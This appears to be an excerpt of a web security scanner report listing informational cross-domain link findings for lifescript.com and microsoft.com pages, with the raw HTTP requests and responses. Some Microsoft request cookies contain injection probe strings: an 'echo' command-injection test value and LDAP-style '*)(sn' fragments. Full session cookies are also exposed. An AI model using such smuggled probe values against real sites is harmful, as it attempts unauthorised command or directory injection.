http://pshared.5min.com/Scripts/ThumbSeed2.js?sid=768&textLocation=1&thumbnailSize=0&width=468&height=200&title=Related%20Videos&headerTextColor=%23000000&textFGColor=%23FFFFFF&textFGColor_MO=%23FFFFFF&textBGColor=%23824A6F&textBGColor_MO=%23EA557A&fallback=0&categories=6,5,8,4,13,2,14&fallbackType=featured&wrapperToShow=titleseed
http://publishers.halogennetwork.com/audience/lifescript.js
http://s7.addthis.com/js/152/addthis_widget.js
http://scripts.chitika.net/eminimalls/amm.js
http://service.optify.net/opt.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://twitter.com/Lifescript
http://twitter.com/lifescript
http://www.addthis.com/bookmark.php
http://www.amazon.com/gp/product/1606233386?ie=UTF8&tag=lifescrcom08-20&linkCode=xm2&camp=1789&creativeASIN=1606233386
http://www.amazon.com/gp/product/1886941971?ie=UTF8&tag=lifescrcom08-20&linkCode=xm2&camp=1789&creativeASIN=1886941971
http://www.facebook.com/lifescript.health
http://www.google-analytics.com/ga.js
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1044624489/?label=6gN9CNv8nQEQ6eiO8gM&guid=ON&script=0
http://www.jott.com/
http://www.livescribe.com/en-us/
http://www.perfectnotes.com/

Request

GET /Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult HTTP/1.1
Host: www.lifescript.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://paid.outbrain.com/network/redir?key=53128c22867c81e65c1ea15e0443913b&rdid=218997956&type=RPM_def_prd&in-site=false&pc_id=2791648&req_id=7fb40496b809f0ff7d359abd61a06af2&agent=blog_JS_rec&recMode=4&reqType=1&wid=100&imgType=0&version=40506&idx=6

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="CAO CNT COM CUR DEV DSP NAV OUR PSA PSD SAM STA TAI UNI"
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 135957
Cache-Control: no-cache, no-store
Expires: Thu, 21 Jul 2011 19:21:50 GMT
Date: Thu, 21 Jul 2011 19:21:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
<script type="text/javascript" src="http://service.optify.net/opt.js"></script>
<script type="text/javascript" src="http://publishers.halogennetwork.com/audience/lifescript.js"></script>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/b?c1=2&c2=6035385&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt=""></noscript>
...[SNIP]...
</script>
<a rel="nofollow" href="http://www.addthis.com/bookmark.php" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()">
Share</a>
...[SNIP]...
</span>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<a id="shareIcon" href="http://www.addthis.com/bookmark.php" rel="nofollow" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><span>SHARE</span></a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...
<i><a href="http://www.amazon.com/gp/product/1606233386?ie=UTF8&tag=lifescrcom08-20&linkCode=xm2&camp=1789&creativeASIN=1606233386" target="_blank" rel="nofollow">Taking Charge of Adult ADHD</a>
...[SNIP]...
<i><a href="http://www.amazon.com/gp/product/1886941971?ie=UTF8&tag=lifescrcom08-20&linkCode=xm2&camp=1789&creativeASIN=1886941971" target="_blank" rel="nofollow">The ADHD Effect on Marriage</a>
...[SNIP]...
<br>Cell phone apps such as <a href="http://www.jott.com/" target="_blank" rel="nofollow">JOTT</a>
...[SNIP]...
<br><a href="http://www.perfectnotes.com/" target="_blank" rel="nofollow">Perfect Notes</a>
...[SNIP]...
<br>There are also pens that record lectures or conversations while you...re writing notes. <a href="http://www.livescribe.com/en-us/" target="_blank" rel="nofollow">Echo Smart Pen</a>
...[SNIP]...
<br>Talk to us on <a href="http://www.facebook.com/lifescript.health" target="_blank">Facebook</a> and <a href="http://twitter.com/lifescript" target="_blank">Twitter</a>
...[SNIP]...
</div>
<script type="text/javascript" src="http://poweredby.kosmix.com/external/ads/kinsert/kosmixCL.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://pshared.5min.com/Scripts/ThumbSeed2.js?sid=768&textLocation=1&thumbnailSize=0&width=468&height=200&title=Related%20Videos&headerTextColor=%23000000&textFGColor=%23FFFFFF&textFGColor_MO=%23FFFFFF&textBGColor=%23824A6F&textBGColor_MO=%23EA557A&fallback=0&categories=6,5,8,4,13,2,14&fallbackType=featured&wrapperToShow=titleseed"></script>
...[SNIP]...
</script><script language="JavaScript" type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<span id="ctl13_ctl22_lblHtml"><a href="http://www.facebook.com/lifescript.health">
<img src="http://images.lifescript.com/images/connect/facebook.jpg" /></a>   
<a href="http://twitter.com/Lifescript"><img src="http://images.lifescript.com/images/connect/tweeter.jpg" />
...[SNIP]...


<script type="text/javascript" src="http://lifescript.us.intellitxt.com/intellitxt/front.asp?ipid=18057"></script>
...[SNIP]...
</script><img width="1" height="1" src="http://pixel1350.everesttech.net/1350/p?ev_transid={7F47B713-0E8E-4DBF-9FCF-DB4D4104C2A4}&ev_pageview=1&ev_category_cat_pageview=1" alt="Efficient Frontier">
</div>
...[SNIP]...
</script><script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://www.googleadservices.com/pagead/conversion.js"></script><noscript><img height="1" width="1" border="0" src="http://www.googleadservices.com/pagead/conversion/1044624489/?label=6gN9CNv8nQEQ6eiO8gM&guid=ON&script=0"></noscript>
...[SNIP]...
</script>
<script src="http://scripts.chitika.net/eminimalls/amm.js" type="text/javascript"></script>
...[SNIP]...

18.177. http://www.lifescript.com/adcontrol.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lifescript.com
Path:	/adcontrol.htm

Issue detail

The page was loaded from a URL containing a query string:

http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=1;sz=728x90;ord=101352252258050

The response contains the following link to another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2/swfobject.js

Request

GET /adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=1;sz=728x90;ord=101352252258050 HTTP/1.1
Host: www.lifescript.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult
Cookie: __utma=22852774.274049985.1311276131.1311276131.1311276131.1; __utmb=22852774.2.10.1311276131; __utmc=22852774; __utmz=22852774.1311276131.1.1.utmcsr=outbrain|utmccn=ADHD_Adult|utmcmd=cpc; __qca=P0-1418956191-1311276132113; scorecardresearch=835324677-1280137661-1311276133382

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 19 Jul 2011 21:27:08 GMT
Accept-Ranges: bytes
ETag: "9281359d5a46cc1:1af3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="CAO CNT COM CUR DEV DSP NAV OUR PSA PSD SAM STA TAI UNI"
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 19:22:07 GMT
Content-Length: 1668
Connection: close

<html>
<head>
<meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
<title>Double Click</title>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2/swfobject.js"></script>
...[SNIP]...

18.178. http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft.com
Path:	/en-au/netsolutionswa/casestudies.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx?bladeFlyout=LocalePicker&SearchType=0&navIndex=2&hdrFo=mthdr02

The response contains the following links to other domains:

http://code.jquery.com/jquery-1.5.1.min.js
http://www.gamesforwindows.com/en-US
http://www.microsoftstore.com.au/shop/en-AU
http://www.xbox.com/en-AU/

Request

GET /en-au/netsolutionswa/casestudies.aspx?bladeFlyout=LocalePicker&SearchType=0&navIndex=2&hdrFo=mthdr02 HTTP/1.1
Host: www.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx?bladeFlyout=LocalePicker&SearchType=0&navIndex=2&hdrFo=mthdr02
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; .ASPXANONYMOUS=g5rG90hmzAEkAAAAMDY4MDQ2YTgtNzVlOS00M2RmLTljMmYtZDU0NDZjZmZiNjdigDOIcfti2RfB0TjvnBWm5ZDDdIY1; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; mstcid=252c88bf; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; WT_NVR=1=online|online%26echo%20958ba620d3208f17%20b1de518eba83f9e9%26|en-us|windowsazure:2=online/help|windows/windowsintune|windows/buy:3=online/help/en-us|en-us/*)(sn|en-us/*)(sn|windows/business/windows-7-test-drive; mcI=Thu, 28 Jul 2011 23:06:08 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00&GO=12; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311326723920:ss=1311326723920; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/22/2011 12:26:19&Microsoft.VisitStartDate=07/22/2011 12:10:45&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=106&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS_SRDR=downloadOptInState=optIn&downloadSiteID=982E5968-67CF-4DCD-891E-39CC43A50DDB

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Fri, 22 Jul 2011 15:48:52 GMT
Last-Modified: Wed, 22 Jun 2011 07:48:35 GMT
ETag: 634443005150000000
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 279637832100000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Fri, 22 Jul 2011 15:38:52 GMT
Content-Length: 114480

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="3081"><head><title>Case Studies</title><meta http-equi
...[SNIP]...
<body bi:type="oneMscomMaster"> <script src="http://code.jquery.com/jquery-1.5.1.min.js" type="text/javascript"></script>
...[SNIP]...
<div class="mstHdr_PrdSection31_Item"><a class="mstHdr_PrdSection31_Image" href="http://www.xbox.com/en-AU/" ><div class="mstHdr_PrdSection31_Image_Inner" align="center" title="xbox">
...[SNIP]...
<div class="mstHdr_PrdSection31_Text"><a Href="http://www.xbox.com/en-AU/"><span>
...[SNIP]...
<div class="mstHdr_PrdSection32_GroupItem"><a Href="http://www.gamesforwindows.com/en-US"><span>
...[SNIP]...
<div class="mstHdr_PrdSection33_GroupItem"><a Href="http://www.microsoftstore.com.au/shop/en-AU"><span>
...[SNIP]...
<div class="mstHdr_PrdSection31_Item"><a href="http://www.xbox.com/en-AU/" class="blockAnchor" style="text-decoration:none" ><div style="height:100%" title="xbox">
...[SNIP]...
<div class="mstHdr_PrdSection32_GroupItem"><a Href="http://www.gamesforwindows.com/en-US"><span>
...[SNIP]...
<div class="mstHdr_PrdSection33_GroupItem"><a Href="http://www.microsoftstore.com.au/shop/en-AU"><span>
...[SNIP]...
<div class="mstHdr_PrdSection31_Item"><a class="mstHdr_PrdSection31_Image" href="http://www.xbox.com/en-AU/" ><div class="mstHdr_PrdSection31_Image_Inner" align="center" title="xbox">
...[SNIP]...
<div class="mstHdr_PrdSection31_Text"><a Href="http://www.xbox.com/en-AU/"><span>
...[SNIP]...
<div class="mstHdr_PrdSection32_GroupItem"><a Href="http://www.gamesforwindows.com/en-US"><span>
...[SNIP]...
<div class="mstHdr_PrdSection33_GroupItem"><a Href="http://www.microsoftstore.com.au/shop/en-AU"><span>
...[SNIP]...
<div class="mstHdr_PrdSection31_Item"><a href="http://www.xbox.com/en-AU/" class="blockAnchor" style="text-decoration:none" ><div style="height:100%" title="xbox">
...[SNIP]...
<div class="mstHdr_PrdSection32_GroupItem"><a Href="http://www.gamesforwindows.com/en-US"><span>
...[SNIP]...
<div class="mstHdr_PrdSection33_GroupItem"><a Href="http://www.microsoftstore.com.au/shop/en-AU"><span>
...[SNIP]...
<div id="ctl00_ctl08_StaticSec13_Repeater_ctl01_ctl00_MenuLink" class="mstHdr_MenuLink"> <a href="http://www.microsoftstore.com.au/shop/en-AU" id="ctl00_ctl08_StaticSec13_Repeater_ctl01_ctl00_MenuLinkAnchor" class="mstHdr_MenuLinkAnchor"> <div id="ctl00_ctl08_StaticSec13_Repeater_ctl01_ctl00_MenuLinkText" class="mstHdr_MenuLinkTxt">
...[SNIP]...

18.179. http://www.microsoft.com/en-us/homepage/Components/Grid/Home.asch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft.com
Path:	/en-us/homepage/Components/Grid/Home.asch

Issue detail

The page was loaded from a URL containing a query string:

http://www.microsoft.com/en-us/homepage/Components/Grid/Home.asch?uid=ctl00_ctl15_PivotItemsRepeater_ctl01_SubPivotBodyRepeater_ctl00_Body

The response contains the following links to other domains:

http://clk.atdmt.com/MRT/go/332102874/direct/01/
http://clk.atdmt.com/MRT/go/332185755/direct/01/
http://clk.atdmt.com/MRT/go/332410515/direct/01/
http://clk.atdmt.com/MRT/go/332544001/direct/01/
http://crm.dynamics.com/en-us/
http://www.bing.com/
http://www.bing.com/finance/
http://www.bing.com/images/
http://www.bing.com/maps/
http://www.bing.com/music
http://www.bing.com/music/lyrics
http://www.bing.com/news
http://www.bing.com/rewards/signup/web?form=MRWHPG&publ=MSCOM&crea=STND_MRWHPG_bingrewards_displayad_athomepage_1x1
http://www.bing.com/shopping
http://www.bing.com/travel/
http://www.bing.com/videos
http://www.bing.com/weather/search?q=weather
http://www.discoverbing.com/mobile/
http://www.microsoftstore.com/store/msstore/cat/categoryID.50606600
http://www.microsoftstore.com/store/msstore/cat/parentCategoryID.44067000/categoryID.50791300
http://www.microsoftstore.com/store/msstore/list/parentCategoryID.44066900/categoryID.50787200
http://www.microsoftstore.com/store/msstore/list/parentCategoryID.50606600/categoryID.50789900

Request

GET /en-us/homepage/Components/Grid/Home.asch?uid=ctl00_ctl15_PivotItemsRepeater_ctl01_SubPivotBodyRepeater_ctl00_Body HTTP/1.1
Host: www.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-us/default.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC0=1311278714446; MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; .ASPXANONYMOUS=g5rG90hmzAEkAAAAMDY4MDQ2YTgtNzVlOS00M2RmLTljMmYtZDU0NDZjZmZiNjdigDOIcfti2RfB0TjvnBWm5ZDDdIY1; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WT_NVR=1=online|online%26echo%20958ba620d3208f17%20b1de518eba83f9e9%26|en-us|windowsazure:2=online/help|windows/windowsintune:3=online/help/en-us|en-us/*)(sn|en-us/*)(sn|windows/business/windows-7-test-drive; mstcid=252c88bf; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311267914536:ss=1311267914528; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=3479ae57-7751-4c89-8161-ba065153f2e6&Microsoft.CreationDate=07/21/2011 20:05:08&Microsoft.LastVisitDate=07/21/2011 20:05:08&Microsoft.NumberOfVisits=1&SessionCookie.Id=824E728916A81675B7F5B989F626528E; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/21/2011 20:05:08&Microsoft.VisitStartDate=07/21/2011 20:05:08&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=78&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=45fae15b2a02454c857d5c6314fa56b7
If-None-Match: 634466640600000000
If-Modified-Since: Tue, 19 Jul 2011 16:21:00 GMT

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Thu, 21 Jul 2011 20:15:26 GMT
Last-Modified: Thu, 21 Jul 2011 17:58:35 GMT
ETag: 634468427150000000
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 438724642800000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Thu, 21 Jul 2011 20:05:25 GMT
Content-Length: 108069

...<div bi:type="hpGrid" bi:parenttitle="item" class="hpGrd_Grid"> <div id="ctl00_ctl15_PivotItemsRepeater_ctl01_SubPivotBodyRepeater_ctl00_Body_ctl01_ColumnRepeater_ctl00_Column" class
...[SNIP]...
<div class="hpHro_Item" style="width:530px;" index="0" bi:index="0" bi:type="infotem"> <a href="http://clk.atdmt.com/MRT/go/332410515/direct/01/" bi:linkid="100-27-121LSUS008440" bi:campaignname="(Windows 7 -- WAU Home Premium to Pro)" bi:type="image" class="hpImage_Link"><img src="http://i.microsoft.com/global/en-us/homepage/PublishingImages/Hero/windowsUpgrade_530x320_lt.jpg" alt="Quickly upgrade to a more advanced edition of Windows 7." width="530" height="320" clas
...[SNIP]...
</p> <a class="hpFeat_Link Arrow" bi:linkid="105-27-121LSUS008440" bi:campaignname="(Windows 7 -- WAU Home Premium to Pro)" bi:type="cta" bi:parenttitle="item" href="http://clk.atdmt.com/MRT/go/332410515/direct/01/"><span class="hpFeat_Text">
...[SNIP]...
epeater_ctl01_SubPivotBodyRepeater_ctl00_Body_ctl01_ColumnRepeater_ctl00_RowRepeater_ctl00_CellRepeater_ctl01_ctl01_featureItemID_Image" class="hpFeat_ImageContainer" bi:parenttitle="item"> <a href="http://clk.atdmt.com/MRT/go/332544001/direct/01/" bi:linkid="110-00-121GMUS007257" bi:campaignname="(Microsoft Security Essentials_2012_Q1)" bi:type="image" class="hpImage_Link"><img src="http://i.microsoft.com/global/en-us/homepage/PublishingImages/thumbnails/SecEss_sm.png" alt="Help protect your PC with Microsoft Security Essentials." width="70" height="70" class="hpImage_I
...[SNIP]...
<li > <a class="hpFeat_Link Arrow" bi:linkid="110-00-121GMUS007257" bi:campaignname="(Microsoft Security Essentials_2012_Q1)" bi:index="0" bi:type="primarycta" href="http://clk.atdmt.com/MRT/go/332544001/direct/01/"><span class="hpFeat_Text">
...[SNIP]...
epeater_ctl01_SubPivotBodyRepeater_ctl00_Body_ctl01_ColumnRepeater_ctl00_RowRepeater_ctl00_CellRepeater_ctl01_ctl01_featureItemID_Image" class="hpFeat_ImageContainer" bi:parenttitle="item"> <a href="http://www.bing.com/rewards/signup/web?form=MRWHPG&publ=MSCOM&crea=STND_MRWHPG_bingrewards_displayad_athomepage_1x1" bi:linkid="111-00-121LSUS009324" bi:campaignname="(Bing Rewards)" bi:type="image" class="hpImage_Link"><img src="http://i.microsoft.com/global/en-us/homepage/PublishingImages/thumbnails/BingBlue_sm.png" alt="Sign up for Bing Rewards to earn credits toward free rewards when you search." width="70" heigh
...[SNIP]...
<li > <a class="hpFeat_Link Arrow" bi:linkid="111-00-121LSUS009324" bi:campaignname="(Bing Rewards)" bi:index="0" bi:type="primarycta" href="http://www.bing.com/rewards/signup/web?form=MRWHPG&publ=MSCOM&crea=STND_MRWHPG_bingrewards_displayad_athomepage_1x1"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="111-00-121LSUS008250" bi:campaignname="(Bing for Mobile (GEN))" bi:index="0" bi:type="secondarycta" href="http://www.discoverbing.com/mobile/"><span class="hpFeat_Text">
...[SNIP]...
votItemsRepeater_ctl01_SubPivotBodyRepeater_ctl00_Body_ctl01_ColumnRepeater_ctl00_RowRepeater_ctl01_CellRepeater_ctl00_ctl01_Item_Image" class="hpFeat_ImageContainer" bi:parenttitle="item"> <a href="http://clk.atdmt.com/MRT/go/332102874/direct/01/" bi:linkid="120-27-121LMUS007473" bi:campaignname="(IE9 Consumer 2012 Q1)" bi:type="image" class="hpImage_Link"><img src="http://i.microsoft.com/global/en-us/homepage/PublishingImages/thumbnails/IE9Logo_sm.png" alt="Download Windows Internet Explorer 9 today." width="70" height="70" class="hpImage_Img"/>
...[SNIP]...
<h5 class="hpFeat_Wrap hpFeat_Title hpFeat_Item" bi:titleflag="item" bi:title="item"><a class="hpFeat_Link" bi:linkid="120-27-121LMUS007473" bi:campaignname="(IE9 Consumer 2012 Q1)" bi:type="title" href="http://clk.atdmt.com/MRT/go/332102874/direct/01/">Internet Explorer 9</a>
...[SNIP]...
<li > <a class="hpFeat_Link Arrow" bi:linkid="120-27-121LMUS007473" bi:campaignname="(IE9 Consumer 2012 Q1)" bi:index="0" bi:type="primarycta" href="http://clk.atdmt.com/MRT/go/332102874/direct/01/"><span class="hpFeat_Text">
...[SNIP]...
votItemsRepeater_ctl01_SubPivotBodyRepeater_ctl00_Body_ctl01_ColumnRepeater_ctl00_RowRepeater_ctl01_CellRepeater_ctl00_ctl01_Item_Image" class="hpFeat_ImageContainer" bi:parenttitle="item"> <a href="http://clk.atdmt.com/MRT/go/332185755/direct/01/" bi:linkid="120-00-121LMUS007426" bi:campaignname="(Windows Phone - Acquisition, Launch and Offers)" bi:type="image" class="hpImage_Link"><img src="http://i.microsoft.com/global/en-us/homepage/PublishingImages/thumbnails/wp7update_sm.png" alt="Shop for your new Windows Phone." width="70" height="70" class="hpImage_Img"/>
...[SNIP]...
<h5 class="hpFeat_Wrap hpFeat_Title hpFeat_Item" bi:titleflag="item" bi:title="item"><a class="hpFeat_Link" bi:linkid="120-00-121LMUS007426" bi:campaignname="(Windows Phone - Acquisition, Launch and Offers)" bi:type="title" href="http://clk.atdmt.com/MRT/go/332185755/direct/01/">Windows Phone</a>
...[SNIP]...
<li > <a class="hpFeat_Link Arrow" bi:linkid="120-00-121LMUS007426" bi:campaignname="(Windows Phone - Acquisition, Launch and Offers)" bi:index="0" bi:type="primarycta" href="http://clk.atdmt.com/MRT/go/332185755/direct/01/"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000017" bi:index="3" bi:type="secondarycta" href="http://crm.dynamics.com/en-us/"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000028" bi:index="1" bi:type="secondarycta" href="http://www.microsoftstore.com/store/msstore/cat/categoryID.50606600"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000032" bi:index="5" bi:type="secondarycta" href="http://www.microsoftstore.com/store/msstore/cat/parentCategoryID.44067000/categoryID.50791300"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000033" bi:index="6" bi:type="secondarycta" href="http://www.microsoftstore.com/store/msstore/list/parentCategoryID.44066900/categoryID.50787200"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000036" bi:index="9" bi:type="secondarycta" href="http://www.microsoftstore.com/store/msstore/list/parentCategoryID.50606600/categoryID.50789900"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000047" bi:index="7" bi:type="secondarycta" href="http://www.microsoftstore.com/store/msstore/list/parentCategoryID.44066900/categoryID.50787200"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000067" bi:index="0" bi:type="secondarycta" href="http://www.bing.com/travel/"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000068" bi:index="1" bi:type="secondarycta" href="http://www.bing.com/finance/"><span class="hpFeat_Text">
...[SNIP]...
<li> <a class="hpFeat_Link Arrow" bi:linkid="050-00-111SEO000069" bi:index="2" bi:type="secondarycta" href="http://www.bing.com/images/"><span class="hpFeat_Text">
...[SNIP]...
